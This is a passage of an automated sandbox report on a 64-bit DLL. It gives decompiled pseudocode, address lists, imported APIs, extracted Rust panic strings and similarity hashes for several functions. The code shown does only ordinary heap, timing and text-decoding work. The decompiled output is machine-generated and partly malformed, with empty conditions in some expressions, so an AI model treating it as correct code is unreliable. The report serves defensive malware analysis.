				 *((long long*)(_t747 + 0x88)) =  *((intOrPtr*)(_t747 + 0xa0));
				_t613 =  *((intOrPtr*)(_t747 + 0xa8));
				_t519 =  *((intOrPtr*)(_t747 + 0x70));
				r13b = r13b | _t305 & 0xffffff00 | _t519 == 0x00000000;
				if (_t519 == 0) goto 0xf30c2380;
				goto 0xf30c239c;
				if (_t613 == _t613 +  *((intOrPtr*)(_t747 + 0xc8))) goto 0xf30c27a7;
				_t307 =  *_t613;
				if (sil < 0) goto 0xf30c221c;
				_t614 = _t613 + 1;
				goto 0xf30c2287;
				if (sil - 0xdf <= 0) goto 0xf30c226d;
				_t156 = _t614 + 3; // 0x3
				_t731 = _t156;
				_t412 = ( *(_t614 + 1) & 0x3f) << 6;
				if (_t307 - 0xf0 < 0) goto 0xf30c227a;
				_t355 = (_t307 & 7) << 0x12;
				_t387 = ( *(_t614 + 2) & 0x3f | _t412) << 6;
				if (( *_t731 & 0x3f | _t387 | _t355) == 0x110000) goto 0xf30c27a7;
				goto 0xf30c2287;
				goto 0xf30c2284;
				_t617 = _t731;
				_t422 = _t387 | (_t355 << 0x00000006 | _t412) << 0x0000000c;
				_t525 = _t422 - 0x3c;
				if (_t525 > 0) goto 0xf30c2294;
				asm("dec ecx");
				if (_t525 < 0) goto 0xf30c22aa;
				_t423 = _t422 + 0xffffffc2;
				_t526 = _t423 - 0x3e;
				if (_t526 > 0) goto 0xf30c2204;
				asm("dec ecx");
				if (_t526 >= 0) goto 0xf30c2204;
				r14b = 5;
				r12b = 3;
				_t527 =  *((intOrPtr*)(_t747 + 0x70));
				r13b = r13b | _t422 & 0xffffff00 | _t527 == 0x00000000;
				_t714 =  *((intOrPtr*)(_t747 + 0x70));
				if (_t527 == 0) goto 0xf30c2380;
				goto 0xf30c2392;
				r14b =  *(_t747 + 0xb1);
				 *(_t747 + 0x108) =  *(_t747 + 0xb2);
				 *(_t747 + 0x10c) =  *(_t747 + 0xb6) & 0x0000ffff;
				 *(_t747 + 0x68) =  *((intOrPtr*)(_t747 + 0xc0));
				_t744 =  *((intOrPtr*)(_t747 + 0xc8));
				if (r12b != 0) goto 0xf30c233c;
				_t529 = _t744 - 9;
				if (_t529 != 0) goto 0xf30c233c;
				if (_t529 == 0) goto 0xf30c277d;
				 *(_t747 + 0x9c) =  *(_t747 + 0x10c) & 0x0000ffff;
				 *(_t747 + 0x98) =  *(_t747 + 0x108);
				 *(_t747 + 0x80) =  *(_t747 + 0x98);
				 *(_t747 + 0x84) =  *(_t747 + 0x9c) & 0x0000ffff;
				if (((_t682 | _t606 << 0x00000020) << 0x00000008 | _t578) == 0) goto 0xf30c239c;
				HeapFree(??, ??, ??);
				if (r12b == 3) goto 0xf30c272d;
				_t317 =  *(_t747 + 0x84) & 0x0000ffff;
				 *(_t747 + 0x134) = _t317;
				_t360 =  *(_t747 + 0x80);
				 *(_t747 + 0x130) = _t360;
				_t688 = _t747 + 0x108;
				 *_t688 = r12b;
				_t688[0] = r14b;
				_t688[0] = _t360;
				_t688[1] = _t317;
				_t688[2] =  *((intOrPtr*)(_t747 + 0xb8));
				_t688[4] =  *(_t747 + 0x68);
				_t688[6] = _t744;
				_t775 = _t747 + 0xa0;
				 *_t775 = _t688;
				_t775[1] = 0x7fef30bd974;
				 *(_t747 + 0x98) = _t714;
				_t757 = _t747 + 0xb0;
				 *_t757 = 0xf314d790;
				 *((long long*)(_t757 + 8)) = 0xf314d790;
				 *((long long*)(_t757 + 0x10)) = 0;
				 *(_t757 + 0x20) = _t775;
				 *((long long*)(_t757 + 0x28)) = 0xf314d790;
				if (E000007FE7FEF3054B50(0, _t747 + 0x98, 0xf314cca8, _t757) != 0) goto 0xf30c29f7;
				_t587 =  *((intOrPtr*)(_t714 + 0x10));
				_t745 =  ==  ? _t587 << 0x00000020 | 0x00000900 : _t744;
				r14b = 9;
				if (bpl != 0) goto 0xf30c257b;
				if ( *(_t747 + 0x108) != 0) goto 0xf30c24c6;
				if ( *((long long*)(_t747 + 0x120)) != 0) goto 0xf30c24c6;
				_t758 = _t747 + 0xb0;
				 *_t758 =  *((intOrPtr*)(_t747 + 0x88));
				 *(_t758 + 8) = _t617;
				_t320 = E000007FE7FEF30C0A70(0xf314cf92, 0xf314cca8, _t758);
				r14d = 0;
				if ( *((char*)(_t747 + 0x1e0)) != 2) goto 0xf30c257b;
				if (_t320 != 0) goto 0xf30c257b;
				_t655 = _t747 + 0xb0;
				 *_t655 =  *((intOrPtr*)(_t747 + 0x88));
				 *(_t655 + 8) = _t617;
				_t321 = E000007FE7FEF30BDE7C(_t655);
				if (_t321 == 0x110000) goto 0xf30c25b4;
				if (_t321 != 0x3a) goto 0xf30c25b4;
				_t734 =  *(_t747 + 0xb0);
				r13d = 0;
				if (_t734 == 0) goto 0xf30c28b9;
				_t802 = _t747 + 0xb0;
				_t592 =  *((intOrPtr*)(_t747 + 0x70));
				 *(_t747 + 0x68) =  *((intOrPtr*)(_t592 + 0x40));
				dil = 1;
				 *(_t747 + 0xb0) = _t734;
				 *((long long*)(_t747 + 0xb8)) =  *((intOrPtr*)(_t802 + 8));
				_t656 = _t802;
				if (E000007FE7FEF30BDE7C(_t656) == 0x110000) goto 0xf30c28ab;
				_t218 = _t592 - 0x30; // -48
				if (_t218 - 0xa >= 0) goto 0xf30c2881;
				r13d = _t656 + _t592 * 2;
				r14b = 2;
				if (r13d - 0xffff <= 0) goto 0xf30c2525;
				if ( *(_t747 + 0x108) != 0) goto 0xf30c272d;
				if ( *((long long*)(_t747 + 0x118)) == 0) goto 0xf30c272d;
				HeapFree(??, ??, ??);
				goto 0xf30c272d;
				 *(_t747 + 0x68) = 0;
				asm("movups xmm0, [esp+0x108]");
				asm("movups xmm1, [esp+0x118]");
				asm("movaps [edx+0x10], xmm1");
				asm("movaps [edx], xmm0");
				_t715 = _t747 + 0x150;
				E000007FE7FEF30BDD82(_t218, 0, _t592, _t715, _t747 + 0xb0,  *((intOrPtr*)(_t747 + 0x110)));
				r12b =  *_t715;
				if (r12b != 0) goto 0xf30c261a;
				if ( *(_t747 + 0x140) ==  *(_t747 + 0x90)) goto 0xf30c261a;
				r14d = 0;
				goto 0xf30c272d;
				_t596 =  *( *((intOrPtr*)(_t747 + 0x70)) + 0x10) << 0x00000020 | 0x00000900;
				r15d = 0x901;
				_t803 =  ==  ? _t596 : _t802;
				r14b = 9;
				if (r15b != 0) goto 0xf30c272d;
				_t692 =  *(_t747 + 0x78) >> 0x20;
				_t746 = ( ==  ? _t587 << 0x00000020 | 0x00000900 : _t744) >> 0x20;
				_t804 = ( ==  ? _t596 : _t802) >> 0x20;
				 *(_t747 + 0x78) = _t715[0];
				 *(_t747 + 0x90) = _t715[2];
				 *(_t747 + 0xb0) = 1;
				 *(_t747 + 0x20) =  *((intOrPtr*)(_t747 + 0xb8));
				_t336 =  *((intOrPtr*)(_t747 + 0x1e0));
				E000007FE7FEF30C4374(_t336,  *((intOrPtr*)(_t747 + 0x70)), _t692, _t747 + 0xb0,  *((intOrPtr*)(_t747 + 0x88)));
				memcpy(0, _t423, 9);
				 *(_t747 + 0x148) = r12b;
				 *((long long*)(_t747 + 0x151)) =  *(_t747 + 0x90);
				 *((long long*)(_t747 + 0x149)) =  *(_t747 + 0x78);
				 *(_t747 + 0x60) = _t692;
				 *(_t747 + 0x58) = _t596;
				 *(_t747 + 0x50) = r15d;
				 *((intOrPtr*)(_t747 + 0x48)) = r13w;
				_t329 =  *(_t747 + 0x68);
				 *(_t747 + 0x40) = _t329;
				 *((long long*)(_t747 + 0x38)) = _t747 + 0x148;
				 *(_t747 + 0x30) = 0x901;
				 *(_t747 + 0x28) = r14d;
				 *(_t747 + 0x20) = _t329;
				r8d = _t336;
				r9d =  *((intOrPtr*)(_t747 + 0x1e8));
				E000007FE7FEF30C3504();
				goto 0xf30c275d;
				_t599 =  *((intOrPtr*)(_t747 + 0x128));
				 *_t599 = r14b;
				_t599[0xb] = 2;
				if ( *((long long*)( *((intOrPtr*)(_t747 + 0x70)) + 8)) == 0) goto 0xf30c275d;
				return HeapFree(??, ??, ??);
			}

0x7fef30c189f
0x7fef30c189f
0x7fef30c189f
0x7fef30c18b2
0x7fef30c18b8
0x7fef30c18bb
0x7fef30c18c6
0x7fef30c18cb
0x7fef30c18d7
0x7fef30c18df
0x7fef30c18e2
0x7fef30c18ea
0x7fef30c18ef
0x7fef30c18f8
0x7fef30c1903
0x7fef30c190b
0x7fef30c190e
0x7fef30c1916
0x7fef30c191a
0x7fef30c1922
0x7fef30c1926
0x7fef30c192d
0x7fef30c1937
0x7fef30c193f
0x7fef30c1944
0x7fef30c1949
0x7fef30c194e
0x7fef30c1950
0x7fef30c1955
0x7fef30c195a
0x7fef30c1960
0x7fef30c1962
0x7fef30c196a
0x7fef30c1973
0x7fef30c197b
0x7fef30c1982
0x7fef30c1984
0x7fef30c198d
0x7fef30c1995
0x7fef30c19a0
0x7fef30c19a5
0x7fef30c19ad
0x7fef30c19b5
0x7fef30c19ba
0x7fef30c19c5
0x7fef30c19ca
0x7fef30c19d2
0x7fef30c19db
0x7fef30c19e4
0x7fef30c19ea
0x7fef30c19f0
0x7fef30c19f6
0x7fef30c19fe
0x7fef30c1a01
0x7fef30c1a09
0x7fef30c1a0f
0x7fef30c1a15
0x7fef30c1a18
0x7fef30c1a1b
0x7fef30c1a1d
0x7fef30c1a24
0x7fef30c1a2a
0x7fef30c1a3d
0x7fef30c1a3f
0x7fef30c1a44
0x7fef30c1a47
0x7fef30c1a4b
0x7fef30c1a51
0x7fef30c1a5e
0x7fef30c1a61
0x7fef30c1a6d
0x7fef30c1a70
0x7fef30c1a79
0x7fef30c1a7b
0x7fef30c1a7e
0x7fef30c1a80
0x7fef30c1a80
0x7fef30c1a87
0x7fef30c1a8a
0x7fef30c1a8e
0x7fef30c1a90
0x7fef30c1a94
0x7fef30c1a96
0x7fef30c1a9c
0x7fef30c1aa2
0x7fef30c1aae
0x7fef30c1aba
0x7fef30c1ac7
0x7fef30c1ac9
0x7fef30c1ad6
0x7fef30c1adf
0x7fef30c1ae5
0x7fef30c1aec
0x7fef30c1aee
0x7fef30c1af3
0x7fef30c1af5
0x7fef30c1afa
0x7fef30c1b07
0x7fef30c1b0d
0x7fef30c1b0d
0x7fef30c1b15
0x7fef30c1b1b
0x7fef30c1b1d
0x7fef30c1b22
0x7fef30c1b3e
0x7fef30c1b45
0x7fef30c1b4b
0x7fef30c1b53
0x7fef30c1b59
0x7fef30c1b65
0x7fef30c1b6a
0x7fef30c1b6f
0x7fef30c1b7c
0x7fef30c1b80
0x7fef30c1b84
0x7fef30c1b87
0x7fef30c1b8d
0x7fef30c1ba1
0x7fef30c1ba4
0x7fef30c1bb5
0x7fef30c1bba
0x7fef30c1bc5
0x7fef30c1bcd
0x7fef30c1bd2
0x7fef30c1bda
0x7fef30c1be9
0x7fef30c1bf4
0x7fef30c1bfc
0x7fef30c1c01
0x7fef30c1c17
0x7fef30c1c20
0x7fef30c1c3e
0x7fef30c1c44
0x7fef30c1c49
0x7fef30c1c66
0x7fef30c1c6d
0x7fef30c1c73
0x7fef30c1c7d
0x7fef30c1c82
0x7fef30c1c8f
0x7fef30c1c9a
0x7fef30c1ca3
0x7fef30c1ca6
0x7fef30c1cb8
0x7fef30c1cbc
0x7fef30c1cc2
0x7fef30c1cc7
0x7fef30c1cce
0x7fef30c1cde
0x7fef30c1cfb
0x7fef30c1d02
0x7fef30c1d08
0x7fef30c1d0c
0x7fef30c1d13
0x7fef30c1d16
0x7fef30c1d20
0x7fef30c1d32
0x7fef30c1d3c
0x7fef30c1d41
0x7fef30c1d4d
0x7fef30c1d51
0x7fef30c1d55
0x7fef30c1d5c
0x7fef30c1d62
0x7fef30c1d7f
0x7fef30c1d86
0x7fef30c1d88
0x7fef30c1d8c
0x7fef30c1d91
0x7fef30c1d98
0x7fef30c1d9e
0x7fef30c1da4
0x7fef30c1db6
0x7fef30c1dc5
0x7fef30c1dc9
0x7fef30c1dce
0x7fef30c1dd4
0x7fef30c1ddc
0x7fef30c1de4
0x7fef30c1dec
0x7fef30c1df4
0x7fef30c1df9
0x7fef30c1dff
0x7fef30c1e0d
0x7fef30c1e13
0x7fef30c1e16
0x7fef30c1e28
0x7fef30c1e2d
0x7fef30c1e30
0x7fef30c1e38
0x7fef30c1e3a
0x7fef30c1e3d
0x7fef30c1e4f
0x7fef30c1e60
0x7fef30c1e7c
0x7fef30c1e89
0x7fef30c1e92
0x7fef30c1e9c
0x7fef30c1e9e
0x7fef30c1ea1
0x7fef30c1ea5
0x7fef30c1ea9
0x7fef30c1ead
0x7fef30c1eb2
0x7fef30c1eb7
0x7fef30c1ebc
0x7fef30c1ec6
0x7fef30c1ec8
0x7fef30c1ece
0x7fef30c1ed4
0x7fef30c1ed9
0x7fef30c1edb
0x7fef30c1ede
0x7fef30c1ee3
0x7fef30c1ee6
0x7fef30c1eeb
0x7fef30c1eee
0x7fef30c1ef0
0x7fef30c1ef4
0x7fef30c1ef6
0x7fef30c1efe
0x7fef30c1f09
0x7fef30c1f16
0x7fef30c1f23
0x7fef30c1f2d
0x7fef30c1f35
0x7fef30c1f3b
0x7fef30c1f43
0x7fef30c1f4a
0x7fef30c1f4d
0x7fef30c1f5f
0x7fef30c1f64
0x7fef30c1f6f
0x7fef30c1f72
0x7fef30c1f75
0x7fef30c1f7a
0x7fef30c1f7d
0x7fef30c1f82
0x7fef30c1f8d
0x7fef30c1f93
0x7fef30c1f98
0x7fef30c1fa4
0x7fef30c1faa
0x7fef30c1fb6
0x7fef30c1fe1
0x7fef30c1ffa
0x7fef30c1fff
0x7fef30c2007
0x7fef30c200d
0x7fef30c2015
0x7fef30c2018
0x7fef30c201e
0x7fef30c2024
0x7fef30c2029
0x7fef30c203c
0x7fef30c2041
0x7fef30c204b
0x7fef30c204d
0x7fef30c2053
0x7fef30c2058
0x7fef30c205f
0x7fef30c2061
0x7fef30c2068
0x7fef30c206e
0x7fef30c2074
0x7fef30c2077
0x7fef30c207d
0x7fef30c2082
0x7fef30c2088
0x7fef30c2091
0x7fef30c209d
0x7fef30c20a6
0x7fef30c20a9
0x7fef30c20b2
0x7fef30c20b8
0x7fef30c20c0
0x7fef30c20ca
0x7fef30c20d5
0x7fef30c20de
0x7fef30c20e2
0x7fef30c20f3
0x7fef30c20fb
0x7fef30c20fd
0x7fef30c210c
0x7fef30c211b
0x7fef30c2133
0x7fef30c2138
0x7fef30c213b
0x7fef30c2143
0x7fef30c2149
0x7fef30c215a
0x7fef30c215f
0x7fef30c2166
0x7fef30c2168
0x7fef30c2170
0x7fef30c2175
0x7fef30c2184
0x7fef30c218b
0x7fef30c2193
0x7fef30c21ab
0x7fef30c21c0
0x7fef30c21c8
0x7fef30c21d0
0x7fef30c21d6
0x7fef30c21de
0x7fef30c21e4
0x7fef30c2207
0x7fef30c220d
0x7fef30c2215
0x7fef30c2217
0x7fef30c221a
0x7fef30c222f
0x7fef30c2231
0x7fef30c2231
0x7fef30c2239
0x7fef30c2243
0x7fef30c224b
0x7fef30c224e
0x7fef30c2261
0x7fef30c226b
0x7fef30c2278
0x7fef30c227f
0x7fef30c2282
0x7fef30c2287
0x7fef30c228a
0x7fef30c228e
0x7fef30c2292
0x7fef30c2294
0x7fef30c2297
0x7fef30c229a
0x7fef30c22a0
0x7fef30c22a4
0x7fef30c22aa
0x7fef30c22b0
0x7fef30c22b3
0x7fef30c22b9
0x7fef30c22bc
0x7fef30c22c1
0x7fef30c22c7
0x7fef30c22cc
0x7fef30c22db
0x7fef30c22ea
0x7fef30c2302
0x7fef30c2307
0x7fef30c2312
0x7fef30c2314
0x7fef30c2318
0x7fef30c2336
0x7fef30c2344
0x7fef30c2353
0x7fef30c2361
0x7fef30c2370
0x7fef30c237e
0x7fef30c238c
0x7fef30c2396
0x7fef30c239c
0x7fef30c23a4
0x7fef30c23ac
0x7fef30c23b3
0x7fef30c23ba
0x7fef30c23c2
0x7fef30c23c5
0x7fef30c23c9
0x7fef30c23cc
0x7fef30c23d0
0x7fef30c23d9
0x7fef30c23dd
0x7fef30c23e1
0x7fef30c23e9
0x7fef30c23f4
0x7fef30c2401
0x7fef30c240b
0x7fef30c2413
0x7fef30c241b
0x7fef30c241f
0x7fef30c2427
0x7fef30c242b
0x7fef30c243d
0x7fef30c2443
0x7fef30c2460
0x7fef30c2464
0x7fef30c246a
0x7fef30c2478
0x7fef30c2483
0x7fef30c2485
0x7fef30c2495
0x7fef30c2498
0x7fef30c24a8
0x7fef30c24ad
0x7fef30c24b8
0x7fef30c24c0
0x7fef30c24c6
0x7fef30c24d6
0x7fef30c24d9
0x7fef30c24dd
0x7fef30c24e7
0x7fef30c24f0
0x7fef30c24f6
0x7fef30c24fe
0x7fef30c2504
0x7fef30c250a
0x7fef30c2516
0x7fef30c251e
0x7fef30c2522
0x7fef30c2525
0x7fef30c252d
0x7fef30c2535
0x7fef30c2542
0x7fef30c2548
0x7fef30c254e
0x7fef30c2569
0x7fef30c256d
0x7fef30c2579
0x7fef30c2583
0x7fef30c2592
0x7fef30c25a9
0x7fef30c25af
0x7fef30c25b4
0x7fef30c25c1
0x7fef30c25c9
0x7fef30c25d9
0x7fef30c25dd
0x7fef30c25e0
0x7fef30c25eb
0x7fef30c25f0
0x7fef30c25fe
0x7fef30c2610
0x7fef30c2612
0x7fef30c2615
0x7fef30c2631
0x7fef30c263a
0x7fef30c2640
0x7fef30c2644
0x7fef30c264f
0x7fef30c2655
0x7fef30c2659
0x7fef30c265d
0x7fef30c2661
0x7fef30c2666
0x7fef30c2676
0x7fef30c267a
0x7fef30c2687
0x7fef30c2693
0x7fef30c26a8
0x7fef30c26ab
0x7fef30c26bb
0x7fef30c26c8
0x7fef30c26d0
0x7fef30c26d5
0x7fef30c26da
0x7fef30c26df
0x7fef30c26e5
0x7fef30c26e9
0x7fef30c26f6
0x7fef30c26fb
0x7fef30c26ff
0x7fef30c270c
0x7fef30c271b
0x7fef30c271e
0x7fef30c2726
0x7fef30c272b
0x7fef30c272d
0x7fef30c2735
0x7fef30c2738
0x7fef30c2749
0x7fef30c2771

APIs

HeapFree.KERNEL32 ref: 000007FEF30C238C
HeapFree.KERNEL32 ref: 000007FEF30C25A9
HeapFree.KERNEL32 ref: 000007FEF30C2757
HeapFree.KERNEL32 ref: 000007FEF30C279C

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30C29C1
localhos, xrefs: 000007FEF30C231A

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$localhos
API String ID: 3298025750-1861780635
Opcode ID: 69adf5af9259855f9be92b8ae0d84b07929c34062acb23a56ba017f6363ff226
Instruction ID: f6492ea879781d0e57a46f5662677bc39852a42a828aa5b8be8c8e23114e7406
Opcode Fuzzy Hash: 69adf5af9259855f9be92b8ae0d84b07929c34062acb23a56ba017f6363ff226
Instruction Fuzzy Hash: 95A26336A0CBC289EBB58A15E4503BA77E6F3897C0F544127DA9D43BA9DB3CD485E700

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30A8460 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 217
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E000007FE7FEF30A8460(signed int __ecx, void* __edx, signed int __esi, void* __eflags, void* __rax, long long* __rcx, void* __rdx) {
				void* _t24;
				void* _t29;
				void* _t31;
				void* _t55;
				void* _t66;
				void* _t73;
				void* _t75;
				void* _t77;
				void* _t81;
				void* _t83;
				void* _t86;
				long long _t89;
				signed long long _t90;
				signed long long _t94;
				signed long long _t96;
				long long* _t99;
				void* _t102;
				signed long long _t103;
				unsigned long long _t105;
				long long* _t107;
				long long* _t111;
				long long* _t112;
				void* _t113;
				void* _t117;
				void* _t119;

				_t86 = __rax;
				_t55 = __edx;
				_t112 = _t113 + 0x60;
				 *_t112 = 0xfffffffe;
				r14d = r8d;
				_t107 = __rcx;
				E000007FE7FEF30A3B10(__ecx, __esi, __rdx);
				_t117 = _t86;
				r15d = _t55;
				_t94 =  *0xf319cf40; // 0x20b4b0
				if (_t94 != 0) goto 0xf30a84ca;
				 *((long long*)(_t112 - 8)) = 0;
				if (QueryPerformanceFrequency(??) == 0) goto 0xf30a86d6;
				_t96 =  *((intOrPtr*)(_t112 - 8));
				 *0xf319cf40 = _t96;
				if (_t96 == 0) goto 0xf30a866e;
				_t24 =  <  ? 0xff : 0 | _t117 != __rdx;
				_t73 = r15d - r14d;
				_t34 =  <  ? 0xff : _t73 != 0;
				_t35 =  !=  ? _t24 :  <  ? 0xff : _t73 != 0;
				_t75 = ( !=  ? _t24 :  <  ? 0xff : _t73 != 0) - 1;
				if (_t75 != 0) goto 0xf30a85a5;
				_t102 = _t117 - __rdx;
				if (_t75 < 0) goto 0xf30a8688;
				if (r15d - r14d >= 0) goto 0xf30a8526;
				_t77 = _t102;
				if (_t77 == 0) goto 0xf30a8688;
				_t103 = _t102 - 1;
				goto 0xf30a852c;
				if (_t77 < 0) goto 0xf30a86a2;
				_t105 = _t103 * 0x44b83 >> 0x27;
				_t41 =  <  ? 0xff : (_t90 * 0x44b83 >> 0x27) + _t103 != _t105;
				dil = r15d - r14d - (r15d - r14d >> 9) * 0x3b9aca00 != 0x3b9aca00 / _t96 - (0x3b9aca00 / _t96 >> 9) * 0x3b9aca00;
				_t65 =  <  ? 0xff : 0;
				_t66 =  !=  ?  <  ? 0xff : (_t90 * 0x44b83 >> 0x27) + _t103 != _t105 :  <  ? 0xff : 0;
				dil = dil + 1;
				_t81 = dil - 2;
				_t111 = _t107;
				if (_t81 >= 0) goto 0xf30a85a5;
				goto 0xf30a85f9;
				_t119 = __rdx - _t117;
				if (_t81 >= 0) goto 0xf30a85b1;
				goto 0xf30a85f9;
				if (r15d - r14d <= 0) goto 0xf30a85c5;
				_t83 = _t119;
				if (_t83 == 0) goto 0xf30a85af;
				r14d = r14d + 0x3b9aca00;
				r14d = r14d - r15d;
				_t89 = (_t96 * 0x44b83 >> 0x27) + _t119 - 1;
				if (_t83 < 0) goto 0xf30a8711;
				r14d = r14d - (r14d >> 9) * 0x3b9aca00;
				if (r14d != 0x3b9aca00) goto 0xf30a8657;
				_t29 = E000007FE7FEF30694DF(0, _t89, _t96 * 0x44b83 >> 0x27);
				asm("movups xmm0, [0xa3c7b]");
				asm("movups [eax], xmm0");
				asm("movups xmm0, [0xa3c7b]");
				asm("movups [eax+0xa], xmm0");
				_t99 = _t112 - 0x38;
				 *_t99 = _t89;
				 *(_t99 + 8) = _t105;
				 *((long long*)(_t99 + 0x10)) = 0x1a;
				_t31 = E000007FE7FEF309FF60(E000007FE7FEF30A877E(_t29, _t89, _t99), 0x16, _t89, _t89, 0xf314a3f8);
				 *_t111 = _t89;
				 *((intOrPtr*)(_t111 + 8)) = 0x3b9aca00;
				goto 0xf30a865d;
				 *_t111 = _t89;
				 *((intOrPtr*)(_t111 + 8)) = 0x16;
				return _t31;
			}

0x7fef30a8460
0x7fef30a8460
0x7fef30a8470
0x7fef30a8475
0x7fef30a847d
0x7fef30a8483
0x7fef30a8486
0x7fef30a848b
0x7fef30a848e
0x7fef30a8491
0x7fef30a849b
0x7fef30a84a1
0x7fef30a84b0
0x7fef30a84b6
0x7fef30a84ba
0x7fef30a84c4
0x7fef30a84d7
0x7fef30a84dc
0x7fef30a84e2
0x7fef30a84e7
0x7fef30a84ea
0x7fef30a84ed
0x7fef30a8500
0x7fef30a8503
0x7fef30a850c
0x7fef30a850e
0x7fef30a8511
0x7fef30a851a
0x7fef30a8524
0x7fef30a8542
0x7fef30a8554
0x7fef30a8580
0x7fef30a8587
0x7fef30a858b
0x7fef30a8590
0x7fef30a8593
0x7fef30a8596
0x7fef30a859a
0x7fef30a859d
0x7fef30a85a3
0x7fef30a85aa
0x7fef30a85ad
0x7fef30a85af
0x7fef30a85b4
0x7fef30a85b6
0x7fef30a85b9
0x7fef30a85be
0x7fef30a85c5
0x7fef30a85d9
0x7fef30a85dc
0x7fef30a85f3
0x7fef30a85ff
0x7fef30a8608
0x7fef30a860d
0x7fef30a8614
0x7fef30a8617
0x7fef30a861e
0x7fef30a8622
0x7fef30a8626
0x7fef30a8629
0x7fef30a862d
0x7fef30a8646
0x7fef30a864b
0x7fef30a864e
0x7fef30a8655
0x7fef30a8657
0x7fef30a865a
0x7fef30a866d

APIs

Part of subcall function 000007FEF30A3B10: QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3B2F
Part of subcall function 000007FEF30A3B10: QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,000007FEF30BB835), ref: 000007FEF30A3B59

QueryPerformanceFrequency.KERNEL32 ref: 000007FEF30A84A8
GetLastError.KERNEL32 ref: 000007FEF30A86D6

Strings

called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF30A86BE, 000007FEF30A872D
overflow when subtracting durations, xrefs: 000007FEF30A8688
attempt to divide by zero/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\core\src\char\methods.rs, xrefs: 000007FEF30A866E

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: PerformanceQuery$Frequency$CounterErrorLast
String ID: attempt to divide by zero/rustc/7eef946fc0e0eff40e588eab77b09b287accbec3\library\core\src\char\methods.rs$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value$overflow when subtracting durations
API String ID: 361767260-2164646399
Opcode ID: bdfc0d61f152e75a1ee1bbc7722349d64d3f982fe2a07b6f296f6d42a58fbf2a
Instruction ID: 94da28486b855187d6507a325edc05379efead61f6a6a93a78cd98cefe4a0c47
Opcode Fuzzy Hash: bdfc0d61f152e75a1ee1bbc7722349d64d3f982fe2a07b6f296f6d42a58fbf2a
Instruction Fuzzy Hash: 6B81E1B2F06B4689EF98CF68E8447B926E6B784394F1491379D4E027B4EE3CD486D300

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF3041208 Relevance: 8.7, APIs: 1, Strings: 4, Instructions: 1167memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 000007FEF3042715

Strings

[]:, xrefs: 000007FEF30427D2
called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value, xrefs: 000007FEF304249D
assertion failed: mid <= self.len(), xrefs: 000007FEF3042798
, xrefs: 000007FEF3041971

Memory Dump Source

Source File: 00000001.00000002.915284627.000007FEF3041000.00000020.00000001.01000000.00000003.sdmp, Offset: 000007FEF3040000, based on PE: true

Associated: 00000001.00000002.915280675.000007FEF3040000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915354749.000007FEF3101000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915485518.000007FEF3169000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915525428.000007FEF319C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.915532692.000007FEF319F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_7fef3040000_loaddll64.jbxd

Similarity

API ID: FreeHeap
String ID: $[]:$assertion failed: mid <= self.len()$called `Option::unwrap()` on a `None` valuecalled `Result::unwrap()` on an `Err` value
API String ID: 3298025750-3362480963
Opcode ID: aea5e3871b87682701a0fee5dc1cc26916ff1ac1f3f32ff4c1f9a768014cd63d
Instruction ID: 307d91d07cbc627953071b4fca5099e39e51933aa7389cb978b279dd4141debf
Opcode Fuzzy Hash: aea5e3871b87682701a0fee5dc1cc26916ff1ac1f3f32ff4c1f9a768014cd63d
Instruction Fuzzy Hash: 4EC2C372A08BC586E7758F18E4413EAB3A1FB98794F405215DFC953B69EB3CD296CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000007FEF30708F0 Relevance: 7.7, Strings: 5, Instructions: 1482
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E000007FE7FEF30708F0(void* __ebx, void* __edi, void* __esi, void* __ebp, long long __rcx, long long __rdx, long long __r8) {
				signed int _t186;
				void* _t191;
				signed char _t198;
				void* _t203;
				void* _t204;
				signed char _t205;
